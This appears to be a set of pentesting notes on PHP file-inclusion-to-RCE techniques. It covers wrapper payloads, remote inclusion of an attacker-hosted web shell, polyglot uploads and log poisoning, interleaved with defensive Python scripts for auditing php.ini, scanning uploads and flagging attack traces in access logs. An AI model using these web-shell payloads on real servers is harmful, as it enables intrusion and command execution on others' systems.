RCE

Remote Code Execution Techniques

  • PHP Wrappers

    • Data Wrapper:

      • Check if allow_url_include=On (use LFI tricks to read the php.ini) (most of the RCE techniques below require this to be on)

        • Apache: /etc/php/X.Y/apache2/php.ini

        • Nginx: /etc/php/X.Y/fpm/php.ini

      • /index.php?path=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id

    • Input Wrapper:

      • Check if allow_url_include=On (Same as data wrapper)

      • curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://ip:port/index.php?path=php://input&cmd=id"

    • Expect Wrapper

      • Check if extension=expect is in the php.ini files (must be on)

      • curl -s "http://ip:port/index.php?path=expect://id"

  • RFI (can be used for SSRF to reach local-only ports, or for RCE by hosting our own shell) (allow_url_include=On must be set in the php.ini file)

    • Host a web shell (sometimes the target only allows outbound connections over web ports or to services it already has open)

      • Through port 80/443:

        1. echo '<?php system($_GET["cmd"]); ?>' > shell.php && python3 -m http.server 80 (or 443)

        2. /index.php?path=http://our_ip:port/shell.php&cmd=id

      • Through ftp server

        1. python -m pyftpdlib -p 21

        2. http://ip:port/index.php?path=ftp://our_ip:port/shell.php&cmd=id
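Both the wrapper tricks and RFI above are gated by php.ini settings (allow_url_include, allow_url_fopen, the expect extension). As an added example that is not part of these notes, here is a small Python audit that parses php.ini text and reports exactly those settings plus whether the command-execution functions are in disable_functions. The two php.ini excerpts are constructed samples, and the parser is simplified: a `;` anywhere on a line starts a comment, so quoted values containing `;` are not handled.

```python
import sys

# Constructed php.ini excerpt in the state the wrapper/RFI techniques need
# (allow_url_include on, expect extension loaded, nothing disabled).
WEAK_PHP_INI = """\
[PHP]
; Whether to allow include/require to open URLs
allow_url_fopen = On
allow_url_include = On
extension=expect
;extension=curl
disable_functions =
"""

# Constructed hardened counterpart for comparison.
HARDENED_PHP_INI = """\
[PHP]
allow_url_fopen = Off
allow_url_include = Off
;extension=expect
disable_functions = system,exec,shell_exec,passthru,popen,proc_open
"""

TRUTHY = {"1", "on", "true", "yes"}
EXEC_FUNCTIONS = {"system", "exec", "shell_exec", "passthru", "popen", "proc_open"}


def parse_php_ini(text):
    """Return (directives, extensions) from php.ini text (';' starts a comment)."""
    directives = {}
    extensions = set()
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line or line.startswith("["):
            continue
        key, sep, value = line.partition("=")
        if not sep:
            continue
        key = key.strip().lower()
        value = value.strip().strip('"')
        if key == "extension":
            # Normalise extension=expect / expect.so / /path/expect.so / php_expect.dll
            name = value.lower().rsplit("/", 1)[-1]
            for suffix in (".so", ".dll"):
                if name.endswith(suffix):
                    name = name[: -len(suffix)]
            if name.startswith("php_"):
                name = name[4:]
            extensions.add(name)
        else:
            directives[key] = value
    return directives, extensions


def audit_php_ini(text):
    """List the findings relevant to include()-based RCE for one php.ini."""
    directives, extensions = parse_php_ini(text)
    findings = []
    # PHP's built-in default for allow_url_include is Off, for allow_url_fopen it is On.
    if directives.get("allow_url_include", "off").lower() in TRUTHY:
        findings.append("allow_url_include=On: include() accepts data://, php://input and remote URLs")
    if directives.get("allow_url_fopen", "on").lower() in TRUTHY:
        findings.append("allow_url_fopen=On: prerequisite for allow_url_include and remote fopen()")
    if "expect" in extensions:
        findings.append("expect extension loaded: expect:// wrapper runs commands")
    disabled = {f.strip().lower() for f in directives.get("disable_functions", "").split(",") if f.strip()}
    missing = sorted(EXEC_FUNCTIONS - disabled)
    if missing:
        findings.append("command functions not in disable_functions: " + ", ".join(missing))
    return findings


def audit_php_ini_file(path):
    """Audit a php.ini on disk, e.g. /etc/php/X.Y/apache2/php.ini or .../fpm/php.ini."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return audit_php_ini(fh.read())


if __name__ == "__main__":
    if sys.argv[1:]:
        for path in sys.argv[1:]:
            print(path)
            for finding in audit_php_ini_file(path) or ["no findings"]:
                print("  -", finding)
    else:
        for label, sample in (("weak sample", WEAK_PHP_INI), ("hardened sample", HARDENED_PHP_INI)):
            print(label)
            for finding in audit_php_ini(sample) or ["no findings"]:
                print("  -", finding)
```

Run it with one or more php.ini paths as arguments to audit a host; with no arguments it audits the two embedded samples. The allow_url_fopen finding is informational, since On is PHP's default and many applications rely on it, but it is the prerequisite for allow_url_include.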

  • File Upload

    • Website wants an image:

      1. echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif

      2. Figure out where the file got uploaded

      3. /index.php?path=path/to/shell.gif&cmd=id

    • Zip archive:

      1. echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php

      2. /index.php?path=zip://shell.jpg%23shell.php&cmd=id

    • Phar

      • php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg

      • /index.php?path=phar://path/to/shell.jpg%2Fshell.txt&cmd=id
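The image, zip and phar uploads above all rely on the upload handler checking only the file extension or the first few bytes. As an added example that is not part of these notes, the Python scanner below checks an uploaded body the way a defender would: it looks for PHP open tags anywhere in the content, compares the content against the full image signature rather than a 4-byte prefix (which is why `GIF8<?php` passes naive checks), and opens anything that is really a zip container to inspect its members, which also covers zip-based phar archives (tar- or phar-format phars are not handled). The three sample uploads are constructed inline.

```python
import io
import re
import zipfile

# Full/echo tags only: matching a bare '<?' would flag every '<?xml' header.
PHP_TAG_RE = re.compile(rb"<\?(?:php\b|=)", re.I)
# Full signatures: the 'GIF8' prefix used above passes a 4-byte check but not these.
MAGIC = {
    "gif": (b"GIF87a", b"GIF89a"),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
}
ZIP_MAGIC = b"PK\x03\x04"
MAX_MEMBER_BYTES = 1_000_000  # don't inflate huge members just to grep them


def build_samples():
    """Constructed uploads: a GIF/PHP polyglot, a zip renamed to .jpg, a clean PNG."""
    gif_polyglot = b'GIF8<?php system($_GET["cmd"]); ?>'
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("shell.php", '<?php system($_GET["cmd"]); ?>')
    zip_as_jpg = buf.getvalue()
    clean_png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32
    return {"shell.gif": gif_polyglot, "shell.jpg": zip_as_jpg, "photo.png": clean_png}


def scan_upload(filename, data):
    """Return findings for one uploaded file body; [] means nothing suspicious."""
    findings = []
    if PHP_TAG_RE.search(data):
        findings.append("PHP open tag in file body")
    if data.startswith(ZIP_MAGIC):
        findings.append("file is a zip container")
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as archive:
                for info in archive.infolist():
                    name = info.filename.lower()
                    if name.endswith((".php", ".phtml", ".phar")):
                        findings.append(f"archive member {info.filename} has a PHP extension")
                    elif info.file_size <= MAX_MEMBER_BYTES and PHP_TAG_RE.search(archive.read(info)):
                        findings.append(f"archive member {info.filename} contains PHP")
        except zipfile.BadZipFile:
            findings.append("malformed zip container")
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext in MAGIC and not data.startswith(MAGIC[ext]):
        findings.append(f"content does not start with a .{ext} signature")
    return findings


if __name__ == "__main__":
    for name, body in build_samples().items():
        print(name, "->", scan_upload(name, body) or "clean")
```

Scanning content is a detection aid, not a substitute for the structural fix: uploads should be stored outside the web root under server-chosen names, and the include target should never be taken from a request parameter.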

  • Log Poisoning

    • PHP session poisoning (the poisoning step that writes the web shell into the session has to be rerun every time)

      1. Read the PHP session file to see which session parameter we can fill with our own input

        • /index.php?path=/var/lib/php/sessions/sess_(session cookie)

      2. Poison PHP session with webshell

        • /index.php?path=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E

      3. Run a command through the poisoned session

        • /index.php?path=/var/lib/php/sessions/sess_(session cookie)&cmd=id

    • Server Logs

      • We control the User-Agent request header, and the web server writes every request, header included, to its log file

        1. Poison User-Agent with a webshell: curl -s "http://ip:port/index.php" -A '<?php system($_GET["cmd"]); ?>'

        2. RCE through the log file: /index.php?path=/var/log/apache2/access.log&cmd=id
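Every technique in these notes leaves a trace in the web server's own access log: a wrapper scheme or a log/session path in the include parameter, or a PHP open tag in the User-Agent. As an added example that is not part of these notes, the Python detector below parses Apache combined-format lines, percent-decodes each query parameter twice (so double-encoded payloads are caught), and flags wrapper schemes, traversal, sensitive local paths and PHP tags in parameters or in the User-Agent. The five log lines are constructed samples, not real traffic.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed Apache combined-format lines (not real traffic): line 1 is benign,
# lines 2-5 mirror the data:// wrapper, User-Agent poisoning, log include and zip tricks.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?path=about.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.6 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?path=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id HTTP/1.1" 200 73 "-" "curl/8.0"
10.0.0.6 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "<?php system($_GET[\\"cmd\\"]); ?>"
10.0.0.6 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?path=/var/log/apache2/access.log&cmd=id HTTP/1.1" 200 9001 "-" "curl/8.0"
10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?path=zip://uploads/shell.jpg%23shell.php&cmd=id HTTP/1.1" 200 73 "-" "curl/8.0"
"""

# Combined log format; referer and User-Agent may contain \" escapes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"'
)

# Stream wrappers that turn include() into code execution or a remote fetch.
WRAPPER_RE = re.compile(r"^(?:data|php|expect|zip|phar|ftp|https?)\s*:", re.I)
PHP_TAG_RE = re.compile(r"<\?(?:php\b|=)", re.I)
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")
# Local files that only matter to an attacker reading them through include().
SENSITIVE_RE = re.compile(r"(?:^|/)(?:etc|proc/self|var/log|var/lib/php/sessions?)/", re.I)


def query_params(query):
    """Yield (key, value) pairs decoded twice, so %2523 and %23 both become '#'."""
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        yield unquote(unquote(key)), unquote(unquote(value))


def analyse_request(target, user_agent):
    """Return the findings for one request target and its User-Agent."""
    findings = []
    for key, value in query_params(urlsplit(target).query):
        if WRAPPER_RE.search(value):
            findings.append(f"wrapper scheme in parameter '{key}'")
        if TRAVERSAL_RE.search(value):
            findings.append(f"path traversal in parameter '{key}'")
        if SENSITIVE_RE.search(value):
            findings.append(f"sensitive local path in parameter '{key}'")
        if PHP_TAG_RE.search(value):
            findings.append(f"PHP open tag in parameter '{key}'")
    if PHP_TAG_RE.search(user_agent):
        findings.append("PHP open tag in User-Agent (log poisoning attempt)")
    return findings


def scan_log(text):
    """Run analyse_request over every parseable line and return alert dicts."""
    alerts = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real deployment should count these
        findings = analyse_request(m["target"], m["ua"])
        if findings:
            alerts.append({"line": lineno, "ip": m["ip"], "target": m["target"], "findings": findings})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(f"line {alert['line']} {alert['ip']} {alert['target']}")
        for finding in alert["findings"]:
            print("   ", finding)
```

The User-Agent check fires on the poisoning request itself, before the attacker ever includes the log, which is the point: the log entry that makes the attack work is the same entry that detects it. The same rules fit a WAF or a SIEM query; the double decode matters because the session-poisoning payload above arrives fully percent-encoded.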
